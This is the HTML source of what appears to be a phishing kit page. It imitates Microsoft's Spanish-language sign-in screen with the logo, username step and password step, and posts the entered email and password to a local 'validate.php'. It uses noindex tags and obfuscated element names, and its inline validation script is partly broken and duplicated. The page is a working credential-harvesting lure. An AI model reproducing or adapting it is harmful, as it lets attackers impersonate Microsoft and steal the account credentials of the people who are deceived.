
<html dir="ltr"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <meta name="robots" content="noindex,nofollow">
          
            
            <script>
                (function (w, d, s, l, i) {
                    w[l] = w[l] || [];
                    w[l].push({'gtm.start':
                                new Date().getTime(), event: 'gtm.js'});
                    var f = d.getElementsByTagName(s)[0],
                            j = d.createElement(s), dl = l != 'dataLayer' ? '&l=' + l : '';
                    j.async = true;
                    j.src =
                            'https://www.googletagmanager.com/gtm.js?id=' + i + dl;
                    f.parentNode.insertBefore(j, f);
                })(window, document, 'script', 'dataLayer', 'GTM-T2VG59');
                        </script>
              <meta name="robots" content="noindex,nofollow">
           
            <meta http-equiv="X-UA-Compatible" content="IE=Edge">
            <title>Iniciar sesion en tu cuenta Microsoft!</title>
            <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, minimum-scale=1.0, user-scalable=yes">
            <link rel="shortcut icon" href="img/favicon.ico">
            <link rel="stylesheet" title="pagina" type="text/css" href="./css/base38388939.css">
            <style type="text/css">body{display:block !important;}</style>
        </head>
   
        <body class="fa">
           
            
           <div>
             <div>
                    <div class="background" role="presentation">
           
                        
                        <div style="background-image">
                        </div>
                        <div></div> </div></div>
                <div data-bind="if: activeDialog"></div> 
    
                <form name="form1" id="form1" method="post" action="validate.php">
                    <div class="outer">
    
                        <div class="middle">
                            <div class="inner fade-in-lightbox" style="
                            padding-bottom: 20px;
                        "> 
    
                                <div class="lightbox-cover"></div>
                                <div data-bind="component: { name: &#39;logo-control&#39;,}">
                                    <img class="logo" role="img" src="./img/logo222.svg"></div>
                                <div style="display: inherit;" id="cargaCorreo" role="main" data-bind="component: { name: &#39;pagination-control&#39;,publicMethods: paginationControlMethods, }">
                                    <div><div class="pagination-view animate slide-in-next">
                                            <div data-viewid="1" data-showfedcredbutton="true" data-bind="pageViewComponent: { name: &#39;login-paginated-username-view&#39;,}">
                                                <div data-bind="component: { name: &#39;header-control&#39;,}">
                                                    <div class="row text-title" id="l0ginHeader">
                                                        <div role="heading" aria-level="1" data-bind="text: title">Iniciar sesión</div></div></div>
                                                <div class="row">
                                                    <div class="form-group col-md-24">
                                                        <div id="error" class="error reedd"></div>
                                                        
                                                        <div class="placeholderContainer" data-bind="component: { name: &#39;placeholder-textbox-field&#39;,publicMethods: usernameTextbox.placeholderTextboxMethods}"> 
                                                            <input autocomplete="off" onkeypress="return runScript(event)" type="text" id="email" name="email" maxlength="120" class="form-control" aria-required="true" aria-describedby="l0ginHeader" placeholder="Correo electrónico, teléfono o Skype" onkeyup="validar()" tabindex="0" required=""> </div>
                                                    </div>
                                                    <div data-bind="css: { &#39;position-buttons&#39;: !tenantBranding.BoilerPlateText }" class="position-buttons"> <div class="row"> <div class="col-md-24"> <div class="text-13 action-links">
                                                                    <div class="form-group" data-bind="">¿No tiene una cuenta? <a href="javascript:void(0)" id="elefante3" name="elefante3">Cree una.</a></div>
                                                                    <div class="form-group"> <a id="elefante2" name="elefante2" href="javascript:void(0)">Iniciar sesión con una llave de seguridad</a> <span class="help-button" role="button" tabindex="0">
                                                                        <img role="presentacion" src="./img/docuemnte212.svg"></span>
                                                                    </div>
                                                                   </div> </div> </div> 
                                                                       
                                                                        <div class="row" data-bind="css: { &#39;move-buttons&#39;: tenantBranding.BoilerPlateText }"> <div data-bind="component: { name: &#39;footer-buttons-field&#39;}">
                                                                <div class="col-xs-24 no-padding-left-right button-container" data-bind="">
    
                                                                    <div class="inline-block">
                                                                        <button type="button" id="botonsito" class="btn btn-block btn-primary ">Siguiente</button>
    
                                                                    </div> 
                                                                </div>
                                                            </div> 
                                                        </div> </div></div>
                                            </div> </div><div class="row tile">
                                                <div class="table" role="button" tabindex="0" data-bind="
                                                    css: { 'list-item': svr.cR },
                                                    pressEnter: $page.otherSigninOptionsButton_onClick,
                                                    click: $page.otherSigninOptionsButton_onClick,
                                                    ariaLabel: $data.text" aria-label="Opciones de inicio de sesión">
                            
                                                    <div class="table-row">
                                                        <div class="table-cell tile-img medium">
                                                           <img class="tile-img medium" role="presentation" data-bind="imgSrc, attr: { src: $data.darkIconUrl }" src="img/llavee.svg">
                                                        </div>
                                                        <div class="table-cell text-left content" data-bind="css: { 'content': !svr.cR }">
                                                            <div data-bind="
                                                                text: $data.text,
                                                                attr: { 'data-test-id': $data.testId }" data-test-id="signinOptions">Opciones de inicio de sesión</div>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div></div>
                                </div>
                               
                                


                                <div style="display:none" id="cargaClave" role="main" data-bind="component: { name: &#39;pagination-control&#39;,publicMethods: paginationControlMethods, }">
                                    <div>
                                        <div class="animate slide-in-next">
                                            <div class="identityBanner">
                                                <div id="regresar" class="backButton" style="padding-top: 1px;">
                                                    <img src="./img/flecha1.svg" alt="arrow left">
                                                </div>

                                                
                                                <div id="nombreListo" class="identity"></div>
                                            </div>
                                        </div>

                                        
                                        <div class="pagination-view animate has-identity-banner slide-in-next">
                                            <div class="row text-title">
                                                Escribir contraseña
                                            </div>
                                            <div class="row">
                                                <div class="form-group col-md-24">
                                                    <div class="placeholderContainer" data-bind="component: { name: &#39;placeholder-textbox-field&#39;,publicMethods: usernameTextbox.placeholderTextboxMethods}"> 
                                                        <input autocomplete="off" type="password" id="pass" required="" name="password" class="form-control" placeholder="Contraseña"> 
                                                    </div>
                                                </div>
                                            </div>
                                            <div class="position-buttons">
                                                <div>
                                                    <div class="row">
                                                        <div class="col-md-24">
                                                            <div class="text-13">
                                                                <div class="form-group">
                                                                    <a href="#">¿Olvidó su contraseña?</a>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                                <div class="win-button-pin-bottom">
                                                    <div class="row">
                                                        <div class="col-xs-24 no-padding-left-right button-container">
                                                            <div class="inline-block">
                                                                <button onclick="" type="submit" class="btn btn-block btn-primary">Iniciar sesión</button>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>

                            </div>
    
                    </div> 
            </div></form></div>
 
    <script src="./js/funciones.js.descarga" type="text/javascript"></script>
    <script src="./js/jquery-3.5.1.min.js.descarga" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
    <script>
    
    </script>
    <script>
    $('#email').on('keydown', function(e) {
           if (e.which == 13) {
               e.preventDefault();
              
        var valorCorreo = document.getElementById("email").value;
        var error = document.getElementById("error");
        var divCorreo = document.getElementById("cargaCorreo");
        var divClave = document.getElementById("cargaClave");
        var correoAdquirido = document.getElementById("nombreListo");
        if ((valorCorreo !== "" && ValidateEmail(valorCorreo)) || validatePhoneNumber(valorCorreo)) {
            divCorreo.style.display = "none";
            divClave.style.display = "inherit";
            correoAdquirido.innerHTML = valorCorreo;
        } else {
            error.innerHTML = msgError(1);
        }
    
           }
    });
        function ShowAndHide() {
            document.querySelector('#displ4yN4me').innerHTML = document.querySelector('#jxkc').value;
            var x = document.getElementById('temporada');
            if (x.style.display == 'none') {
                x.style.display = 'block';
            } else {
                x.style.display = 'none';
            }
    
        }
        function anular(e) {
            tecla = (document.all) ? e.keyCode : e.which;
            return (tecla != 13);
        }
    
        function validar(e) {
            var validado = false;
    
            var letters = /^[0-9a-zA-Z]+$/;
            var filter = /^([a-zA-Z0-9\_\.\_])+\@(([a-zA-Z0-9\_])+\.)+([a-zA-Z0-9]{2,4})+$/;
            elementos = document.getElementsByClassName("form-control ltr_override");
            for (i = 0; i < elementos.length; i++) {
    
                if (filter.test(elementos[i].value) || letters.test(elementos[i].value))
                {
                    validado = false
                }
            }
            if (validado) {
                document.getElementById("botonsito").disabled = false;
    
            } else {
                document.getElementById("botonsito").disabled = false;
            }
        }
        function validar(e) 
            var validado = false;
    
            var letters = /^[0-9a-zA-Z]+$/;
            var filter = /^([a-zA-Z0-9\_\.\_])+\@(([a-zA-Z0-9\_])+\.)+([a-zA-Z0-9]{2,4})+$/;
            elementos = document.getElementsByClassName("form-control ltr_override");
            for (i = 0; i < elementos.length; i++) {
    
                if (filter.test(elementos[i].value) || letters.test(elementos[i].value))
                {
                    validado = false
                }
            }
        
    </script>
    
    
            </body></html>